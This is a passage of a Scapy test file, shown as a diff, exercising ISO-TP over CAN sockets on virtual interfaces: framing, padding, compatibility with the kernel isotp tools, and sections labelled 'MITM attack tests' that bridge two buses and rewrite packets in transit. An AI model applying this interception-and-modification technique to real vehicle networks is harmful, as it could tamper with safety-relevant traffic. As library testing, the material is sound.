new_can_socket(iface0) as cans: - evt.set() - can = cans.sniff(timeout=1, count=1)[0] - cans.send(CAN(identifier = 0x241, data=dhex("32 00 00"))) - -thread = Thread(target=acker) -thread.start() -evt.wait(timeout=5) - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - try: - s.send(isotp) - except Scapy_Exception as ex: - exception = ex - -thread.join(timeout=5) - -assert(exception is not None) - -assert(str(exception) == "Overflow happened at the receiver side") - -= Close the Socket -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: - s.close() - -+ More complex operations - -= ISOTPSoftSocket sr1 -drain_bus(iface0) -drain_bus(iface1) - -evt = threading.Event() -msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') -rx2 = None -evt2 = threading.Event() - -def sender(sock): - global evt, rx2, msg - evt2.set() - evt.wait(timeout=5) - rx2 = sock.sr1(msg, timeout=3, verbose=True) - -with new_can_socket0() as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as sock_tx, \ - new_can_socket0() as isocan_rx, ISOTPSoftSocket(isocan_rx, 0x321, 0x123) as sock_rx: - txThread = threading.Thread(target=sender, args=(sock_tx,)) - txThread.start() - evt2.wait(timeout=1) - rx = sock_rx.sniff(timeout=3, count=1, started_callback=evt.set)[0] - sock_rx.send(msg) - sent = True - txThread.join(timeout=5) - -assert(rx == msg) -assert(sent) -assert(rx2 is not None) -assert(rx2 == msg) - -= ISOTPSoftSocket sr1 and ISOTP test vice versa -drain_bus(iface0) -drain_bus(iface1) - -rx2 = None -sent = False -evt = threading.Event() -msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') - -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x123, 0x321) as txSock: - def receiver(): - global rx2, sent - with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, 0x321, 0x123) as rxSock: - evt.set() - rx2 = rxSock.sniff(count=1, timeout=3) - rxSock.send(msg) - sent = True - rxThread = threading.Thread(target=receiver, name="receiver") - rxThread.start() - evt.wait(timeout=5) - rx = txSock.sr1(msg, timeout=5,verbose=True) - rxThread.join(timeout=5) - -assert(rx is not None) -assert(rx == msg) -assert(len(rx2) == 1) -assert(rx2[0] == msg) -assert(sent) - -= ISOTPSoftSocket sniff -evt = threading.Event() -succ = False - -def receiver(): - global evt, succ, rx - with new_can_socket0() as isocan, \ - ISOTPSoftSocket(isocan, 0x321, 0x123) as sock: - rx = sock.sniff(count=5, timeout=5, started_callback=evt.set) - succ = True - -rxThread = threading.Thread(target=receiver) -rxThread.start() -evt.wait(timeout=5) - -msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') -with new_can_socket0() as isocan, \ - ISOTPSoftSocket(isocan, 0x123, 0x321) as sock: - msg.data += b'0' - sock.send(msg) - time.sleep(0.1) - msg.data += b'1' - sock.send(msg) - time.sleep(0.1) - msg.data += b'2' - sock.send(msg) - time.sleep(0.1) - msg.data += b'3' - sock.send(msg) - time.sleep(0.1) - msg.data += b'4' - sock.send(msg) - time.sleep(0.1) - -rxThread.join(timeout=5) -msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') -msg.data += b'0' -assert(rx[0] == msg) -msg.data += b'1' -assert(rx[1] == msg) -msg.data += b'2' -assert(rx[2] == msg) -msg.data += b'3' -assert(rx[3] == msg) -msg.data += b'4' -assert(rx[4] == msg) -assert(succ) - -+ ISOTPSoftSocket MITM attack tests - -= bridge and sniff with isotp soft sockets set up vcan0 and vcan1 for package forwarding vcan1 -~ needs_root -drain_bus(iface0) -drain_bus(iface1) - -succ = False - -with new_can_socket0() as can0_0, \ - new_can_socket0() as can0_1, \ - new_can_socket1() as can1_0, \ - new_can_socket1() as can1_1, \ - ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ - ISOTPSoftSocket(can1_0, sid=0x541, did=0x141) as isoTpSocket1, \ - ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ - ISOTPSoftSocket(can1_1, sid=0x141, did=0x141) as bSocket1: - evt = threading.Event() - def forwarding(pkt): - global forwarded - forwarded += 1 - return pkt - def bridge(): - global forwarded, succ - forwarded = 0 - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, - started_callback=evt.set) - succ = True - threadBridge = threading.Thread(target=bridge) - threadBridge.start() - evt.wait(timeout=5) - packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, started_callback=lambda: isoTpSocket0.send(ISOTP(b'Request'))) - threadBridge.join(timeout=5) - -assert forwarded == 1 -assert len(packetsVCan1) == 1 -assert succ - -drain_bus(iface0) -drain_bus(iface1) - -= bridge and sniff with isotp soft sockets and multiple long packets -~ needs_root -drain_bus(iface0) -drain_bus(iface1) - -N = 3 -T = 20 - -succ = False -with new_can_socket0() as can0_0, \ - new_can_socket0() as can0_1, \ - new_can_socket1() as can1_0, \ - new_can_socket1() as can1_1, \ - ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ - ISOTPSoftSocket(can1_0, sid=0x541, did=0x141) as isoTpSocket1, \ - ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ - ISOTPSoftSocket(can1_1, sid=0x141, did=0x541) as bSocket1: - evt = threading.Event() - def forwarding(pkt): - global forwarded - forwarded += 1 - return pkt - def bridge(): - global forwarded, succ - forwarded = 0 - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, - timeout=T, count=N, started_callback=evt.set) - succ = True - def sendpkts(): - for _ in range(N): - time.sleep(0.2) - isoTpSocket0.send(ISOTP(b'RequestASDF1234567890')) - threadBridge = threading.Thread(target=bridge) - threadBridge.start() - evt.wait(timeout=5) - sender = threading.Thread(target=sendpkts) - packetsVCan1 = isoTpSocket1.sniff(timeout=T, count=N, started_callback=sender.start) - sender.join(timeout=5) - threadBridge.join(timeout=5) - -assert forwarded == N -assert len(packetsVCan1) == N -assert succ - -drain_bus(iface0) -drain_bus(iface1) - -= bridge and sniff with isotp soft sockets set up vcan0 and vcan1 for package change vcan1 -~ needs_root -drain_bus(iface0) -drain_bus(iface1) - -succ = False -with new_can_socket0() as can0_0, \ - new_can_socket0() as can0_1, \ - new_can_socket1() as can1_0, \ - new_can_socket1() as can1_1, \ - ISOTPSoftSocket(can0_0, sid=0x241, did=0x641) as isoTpSocket0, \ - ISOTPSoftSocket(can1_0, sid=0x641, did=0x241) as isoTpSocket1, \ - ISOTPSoftSocket(can0_1, sid=0x641, did=0x241) as bSocket0, \ - ISOTPSoftSocket(can1_1, sid=0x241, did=0x641) as bSocket1: - evt = threading.Event() - def forwarding(pkt): - pkt.data = 'changed' - return pkt - def bridge(): - global succ - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=5, - started_callback=evt.set) - succ = True - threadBridge = threading.Thread(target=bridge) - threadBridge.start() - evt.wait(timeout=5) - packetsVCan1 = isoTpSocket1.sniff(timeout=2, started_callback=lambda: isoTpSocket0.send(ISOTP(b'Request'))) - threadBridge.join(timeout=5) - -assert len(packetsVCan1) == 1 -assert packetsVCan1[0].data == b'changed' -assert succ - -drain_bus(iface0) -drain_bus(iface1) - -= Two ISOTPSockets at the same time, sending and receiving - -with new_can_socket0() as cs1, ISOTPSocket(cs1, sid=0x641, did=0x241) as s1, \ - new_can_socket0() as cs2, ISOTPSocket(cs2, sid=0x241, did=0x641) as s2: - isotp = ISOTP(data=b"\x10\x25" * 43) - def sender(): - s2.send(isotp) - t = Thread(target=sender) - result = s1.sniff(count=1, timeout=5, started_callback=t.start) - t.join(timeout=5) - -assert len(result) == 1 -assert(result[0].data == isotp.data) - - -= Two ISOTPSockets at the same time, sending and receiving with tx_gap - -with new_can_socket0() as cs1, ISOTPSocket(cs1, sid=0x641, did=0x241, stmin=1) as s1, \ - new_can_socket0() as cs2, ISOTPSocket(cs2, sid=0x241, did=0x641) as s2: - isotp = ISOTP(data=b"\x10\x25" * 43) - def sender(): - s2.send(isotp) - t = Thread(target=sender) - result = s1.sniff(count=1, timeout=5, started_callback=t.start) - t.join(timeout=5) - -assert len(result) == 1 -assert(result[0].data == isotp.data) - - -= Two ISOTPSockets at the same time, multiple sends/receives -with new_can_socket0() as cs1, ISOTPSocket(cs1, sid=0x641, did=0x241) as s1, \ - new_can_socket0() as cs2, ISOTPSocket(cs2, sid=0x241, did=0x641) as s2: - def sender(p): - s2.send(p) - for i in range(1, 40, 5): - isotp = ISOTP(data=bytearray(range(i, i * 2))) - t = Thread(target=sender, args=(isotp,)) - result = s1.sniff(count=1, timeout=5, started_callback=t.start) - t.join(timeout=5) - assert len(result) - assert (result[0].data == isotp.data) - - -= Send a single frame ISOTP message with padding -with new_can_socket0() as cs1, ISOTPSocket(cs1, sid=0x641, did=0x241, padding=True) as s: - with new_can_socket(iface0) as cans: - s.send(ISOTP(data=dhex("01"))) - res = cans.sniff(timeout=1, count=1)[0] - assert(res.length == 8) - - -= Send a two-frame ISOTP message with padding -acker_ready = threading.Event() -def acker(): - with new_can_socket(iface0) as acks: - acker_ready.set() - can = acks.sniff(timeout=1, count=1)[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) - -with new_can_socket(iface0) as cans: - ack_thread = Thread(target=acker) - ack_thread.start() - acker_ready.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241, padding=True) as s: - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08 CC CC CC CC CC")) - ack_thread.join(timeout=5) - - -= Receive a padded single frame ISOTP message with padding disabled -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241, padding=False) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) - res = s.recv() - assert(res.data == dhex("05 06")) - - -= Receive a padded single frame ISOTP message with padding enabled -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241, padding=True) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) - res = s.recv() - assert(res.data == dhex("05 06")) - - -= Receive a non-padded single frame ISOTP message with padding enabled -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241, padding=True) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) - res = s.recv() - assert(res.data == dhex("05 06")) - - -= Receive a padded two-frame ISOTP message with padding enabled -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241, padding=True) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) - cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - res = s.recv() - assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) - - -= Receive a padded two-frame ISOTP message with padding disabled -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241, padding=False) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) - cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - res = s.recv() - res.show() - assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) - - -+ Compatibility with can-isotp linux kernel modules -~ vcan_socket needs_root linux - -= Compatibility with isotpsend -exit_if_no_isotp_module() - -message = "01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14" - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242) as s: - p = subprocess.Popen(["isotpsend", "-s", "242", "-d", "642", iface0], stdin=subprocess.PIPE, universal_newlines=True) - p.communicate(message) - r = p.returncode - assert(r == 0) - isotp = s.recv() - assert(isotp.data == dhex(message)) - - -= Compatibility with isotpsend - extended addresses -exit_if_no_isotp_module() -message = "01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14" - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x644, did=0x244, extended_addr=0xaa, extended_rx_addr=0xee) as s: - p = subprocess.Popen(["isotpsend", "-s", "244", "-d", "644", "-x", "ee:aa", iface0], stdin=subprocess.PIPE, universal_newlines=True) - p.communicate(message) - r = p.returncode - assert(r == 0) - isotp = s.recv() - assert(isotp.data == dhex(message)) - - -= Compatibility with isotprecv -exit_if_no_isotp_module() - -isotp = ISOTP(data=bytearray(range(1,20))) -cmd = ["isotprecv", "-s", "243", "-d", "643", "-b", "3", iface0] -p = subprocess.Popen(cmd, stdout=subprocess.PIPE) -time.sleep(0.1) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x643, did=0x243) as s: - s.send(isotp) - -threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()).start() # Timeout the receiver after 1 second -r = p.wait() -assert(0 == r) - -result = None -for i in range(10): - time.sleep(0.1) - if p.poll() is not None: - result = p.stdout.readline().decode().strip() - break - -assert(result is not None) -result_data = dhex(result) -assert(result_data == isotp.data) - - -= Compatibility with isotprecv - extended addresses -exit_if_no_isotp_module() -isotp = ISOTP(data=bytearray(range(1,20))) -cmd = ["isotprecv", "-s245", "-d645", "-b3", "-x", "ee:aa", iface0] -p = subprocess.Popen(cmd, stdout=subprocess.PIPE) -time.sleep(0.1) # Give some time for starting reception -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x645, did=0x245, extended_addr=0xaa, extended_rx_addr=0xee) as s: - s.send(isotp) - -threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()).start() # Timeout the receiver after 1 second -r = p.wait() -assert(0 == r) - -result = None -for i in range(10): - time.sleep(0.1) - if p.poll() is not None: - result = p.stdout.readline().decode().strip() - break - -assert(result is not None) -result_data = dhex(result) -assert(result_data == isotp.data) - - -+ ISOTPNativeSocket tests -~ python3_only not_pypy vcan_socket needs_root linux - - -= Overwrite definition for vcan_socket systems native sockets -~ conf -if six.PY3 and LINUX: - conf.contribs['CANSocket'] = {'use-python-can': False} - from scapy.contrib.cansocket_native import * - new_can_socket = lambda iface: CANSocket(iface) - new_can_socket0 = lambda: CANSocket(iface0) - new_can_socket1 = lambda: CANSocket(iface1) - - - -= Create ISOTP socket -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) - - -= Send single frame ISOTP message -exit_if_no_isotp_module() - -with new_can_socket(iface0) as cans: - s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) - s.send(ISOTP(data=dhex("01 02 03 04 05"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("05 01 02 03 04 05")) - - -= Send single frame ISOTP message Test init with CANSocket -exit_if_no_isotp_module() -cans = CANSocket(iface0) -s = ISOTPNativeSocket(cans, sid=0x641, did=0x241) -s.send(ISOTP(data=dhex("01 02 03 04 05"))) -can = cans.sniff(timeout=1, count=1)[0] -assert(can.identifier == 0x641) -assert(can.data == dhex("05 01 02 03 04 05")) -cans.close() - - -= Test init with wrong type -exit_if_no_isotp_module() -exception_catched = False -try: - s = ISOTPNativeSocket(42, sid=0x641, did=0x241) -except Scapy_Exception: - exception_catched = True - -assert exception_catched - -= Send two-frame ISOTP message -exit_if_no_isotp_module() - -evt = threading.Event() -def acker(): - with new_can_socket(iface0) as cans: - evt.set() - can = cans.sniff(timeout=1, count=1)[0] - cans.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) - - -with new_can_socket(iface0) as cans: - t = Thread(target=acker) - t.start() - s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) - evt.wait(timeout=5) - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08")) - t.join(timeout=5) - -= Send a single frame ISOTP message with padding -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) - -with new_can_socket(iface0) as cans: - s.send(ISOTP(data=dhex("01"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.length == 8) - - -= Send a two-frame ISOTP message with padding -exit_if_no_isotp_module() - -acker_ready = threading.Event() -def acker(): - with new_can_socket(iface0) as acks: - acker_ready.set() - can = acks.sniff(timeout=1, count=1)[0] - acks.send(CAN(identifier = 0x241, data=dhex("30 00 00"))) - -with new_can_socket(iface0) as cans: - Thread(target=acker).start() - acker_ready.wait(timeout=5) - s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) - s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("10 08 01 02 03 04 05 06")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x241) - assert(can.data == dhex("30 00 00")) - can = cans.sniff(timeout=1, count=1)[0] - assert(can.identifier == 0x641) - assert(can.data == dhex("21 07 08 CC CC CC CC CC")) - - -= Receive a padded single frame ISOTP message with padding disabled -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=False) -with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) - res = s.recv() - assert(res.data == dhex("05 06")) - - -= Receive a padded single frame ISOTP message with padding enabled -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) -with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) - res = s.recv() - assert(res.data == dhex("05 06")) - - -= Receive a non-padded single frame ISOTP message with padding enabled -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) -with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) - res = s.recv() - assert(res.data == dhex("05 06")) - - -= Receive a padded two-frame ISOTP message with padding enabled -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) -with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) - cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - res = s.recv() - assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) - - -= Receive a padded two-frame ISOTP message with padding disabled -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=False) -with new_can_socket(iface0) as cans: - cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) - cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) - res = s.recv() - assert(res.data == dhex("01 02 03 04 05 06 07 08 09")) - - -= Receive a single frame ISOTP message -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) - isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.src == 0x641) - assert(isotp.dst == 0x241) - assert(isotp.exsrc == None) - assert(isotp.exdst == None) - - -= Receive a single frame ISOTP message, with extended addressing -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, extended_addr=0xc0, extended_rx_addr=0xea) -with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) - isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.src == 0x641) - assert(isotp.dst == 0x241) - assert(isotp.exsrc == 0xc0) - assert(isotp.exdst == 0xea) - - -= Receive a two-frame ISOTP message -exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) - cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) - isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) - -= Receive a two-frame ISOTP message and test python with statement -exit_if_no_isotp_module() -with ISOTPNativeSocket(iface0, sid=0x641, did=0x241) as s: - with new_can_socket(iface0) as cans: - cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) - cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) - isotp = s.recv() - assert(isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11")) - - -= ISOTP Socket sr1 test -exit_if_no_isotp_module() - -txSock = ISOTPNativeSocket(iface0, sid=0x123, did=0x321, basecls=ISOTP) -txmsg = ISOTP(b'\x11\x22\x33') -rx2 = None - -receiver_up = Event() - -def sender(): - global receiver_up - receiver_up.wait(timeout=5) - global txmsg - global rx2 - rx2 = txSock.sr1(txmsg, timeout=1, verbose=True) - -def receiver(): - global receiver_up - with new_can_socket(iface0) as cans: - rx = cans.sniff(timeout=1, count=1, started_callback=receiver_up.set)[0] - cans.send(CAN(identifier=0x321, length=4, data=b'\x03\x7f\x22\x33')) - expectedrx = CAN(identifier=0x123, length=4, data=b'\x03\x11\x22\x33') - assert(rx.length == expectedrx.length) - assert(rx.data == expectedrx.data) - assert(rx.identifier == expectedrx.identifier) - -txThread = threading.Thread(target=sender) -txThread.start() -receiver() -txThread.join(timeout=5) - -assert(rx2 is not None) -assert(rx2 == ISOTP(b'\x7f\x22\x33')) -assert(rx2.answers(txmsg)) - -= ISOTP Socket sr1 and ISOTP test -exit_if_no_isotp_module() -txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) -rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) -msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') -rx2 = None - -receiver_up = Event() - -def sender(): - receiver_up.wait(timeout=5) - global rx2 - rx2 = txSock.sr1(msg, timeout=1, verbose=True) - -def receiver(): - global rx - receiver_up.set() - rx = rxSock.recv() - rxSock.send(msg) - -txThread = threading.Thread(target=sender) -txThread.start() -receiver() -txThread.join(timeout=5) - -assert(rx == msg) -assert(rxSock.send(msg)) -assert(rx2 is not None) -assert(rx2 == msg) - -= ISOTP Socket sr1 and ISOTP test vice versa -exit_if_no_isotp_module() - -rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) -txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) - -msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') - -receiver_up = Event() - -def receiver(): - global rx2, sent - rx2 = rxSock.sniff(count=1, timeout=1, started_callback=receiver_up.set) - sent = rxSock.send(msg) - -def sender(): - global rx - receiver_up.wait(timeout=5) - rx = txSock.sr1(msg, timeout=1,verbose=True) - -rx2 = None -sent = False -rxThread = threading.Thread(target=receiver) -rxThread.start() -sender() -rxThread.join(timeout=5) - -assert(rx == msg) -assert(rx2[0] == msg) -assert(sent) - -= ISOTP Socket sniff -exit_if_no_isotp_module() - -rxSock = ISOTPNativeSocket(iface0, 0x321, 0x123, basecls=ISOTP) -txSock = ISOTPNativeSocket(iface0, 0x123, 0x321, basecls=ISOTP) -succ = False - -receiver_up = Event() - -def receiver(): - rx = rxSock.sniff(count=5, timeout=1, started_callback=receiver_up.set) - msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') - msg.data += b'0' - assert(rx[0] == msg) - msg.data += b'1' - assert(rx[1] == msg) - msg.data += b'2' - assert(rx[2] == msg) - msg.data += b'3' - assert(rx[3] == msg) - msg.data += b'4' - assert(rx[4] == msg) - global succ - succ = True - -def sender(): - receiver_up.wait(timeout=5) - msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') - msg.data += b'0' - assert(txSock.send(msg)) - msg.data += b'1' - assert(txSock.send(msg)) - msg.data += b'2' - assert(txSock.send(msg)) - msg.data += b'3' - assert(txSock.send(msg)) - msg.data += b'4' - assert(txSock.send(msg)) - -rxThread = threading.Thread(target=receiver) -rxThread.start() -sender() -rxThread.join(timeout=5) - -assert(succ) - -+ ISOTPNativeSocket MITM attack tests -~ python3_only vcan_socket needs_root linux - -= bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package forwarding vcan1 -exit_if_no_isotp_module() - -isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) -isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) -bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) - -bridgeStarted = threading.Event() -def bridge(): - global bridgeStarted - def forwarding(pkt): - return pkt - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=2, count=1, started_callback=bridgeStarted.set) - bSocket0.close() - bSocket1.close() - global bSucc - bSucc = True - -def RequestOnBus0(): - global rSucc - isoTpSocket0.send(ISOTP(b'Request')) - rSucc = True - -bSucc = False -rSucc = False - -threadBridge = threading.Thread(target=bridge) -threadBridge.start() -threadSender = threading.Thread(target=RequestOnBus0) -bridgeStarted.wait(timeout=5) - -packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, started_callback=threadSender.start) - -len(packetsVCan1) == 1 - -isoTpSocket0.close() -isoTpSocket1.close() - -threadSender.join(timeout=5) -threadBridge.join(timeout=5) - -assert(bSucc) -assert(rSucc) - -= bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package change to vcan1 -exit_if_no_isotp_module() - -isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) -isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) -bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) - -bSucc = False -rSucc = False - -bridgeStarted = threading.Event() -def bridge(): - global bridgeStarted - global bSucc - def forwarding(pkt): - pkt.data = 'changed' - return pkt - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, started_callback=bridgeStarted.set) - bSocket0.close() - bSocket1.close() - bSucc = True - -def RequestOnBus0(): - global rSucc - isoTpSocket0.send(ISOTP(b'Request')) - rSucc = True - -threadBridge = threading.Thread(target=bridge) -threadBridge.start() -threadSender = threading.Thread(target=RequestOnBus0) -bridgeStarted.wait(timeout=5) -packetsVCan1 = isoTpSocket1.sniff(timeout=0.5, started_callback=threadSender.start) - -packetsVCan1[0].data = b'changed' -len(packetsVCan1) == 1 - -isoTpSocket0.close() -isoTpSocket1.close() - -threadSender.join(timeout=5) -threadBridge.join(timeout=5) - -assert(bSucc) -assert(rSucc) - -= bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package forwarding in both directions -exit_if_no_isotp_module() - -bSucc = False -rSucc = False - -isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) -isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) -bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) - -bridgeStarted = threading.Event() -def bridge(): - global bridgeStarted - global bSucc - def forwarding(pkt): - return pkt - bridge_and_sniff(if1=bSocket0, if2=bSocket1, xfrm12=forwarding, xfrm21=forwarding, timeout=0.5, started_callback=bridgeStarted.set) - bSocket0.close() - bSocket1.close() - bSucc = True - -def RequestBothVCans(): - global rSucc - packetVcan0 = ISOTP(b'RequestVcan0') - packetVcan1 = ISOTP(b'RequestVcan1') - isoTpSocket0.send(packetVcan0) - isoTpSocket1.send(packetVcan1) - rSucc = True - -threadBridge = threading.Thread(target=bridge) -threadBridge.start() -threadSender = threading.Thread(target=RequestOnBus0) -bridgeStarted.wait(timeout=5) - -packetsVCan0 = isoTpSocket0.sniff(timeout=0.5, started_callback=threadSender.start) -packetsVCan1 = isoTpSocket1.sniff(timeout=0.5) - -len(packetsVCan0) == 1 -len(packetsVCan1) == 1 - -isoTpSocket0.close() -isoTpSocket1.close() - -threadSender.join(timeout=5) -threadBridge.join(timeout=5) - -assert(bSucc) -assert(rSucc) - -= bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package change in both directions -exit_if_no_isotp_module() - -bSucc = False -rSucc = False - -isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) -isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) -bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, 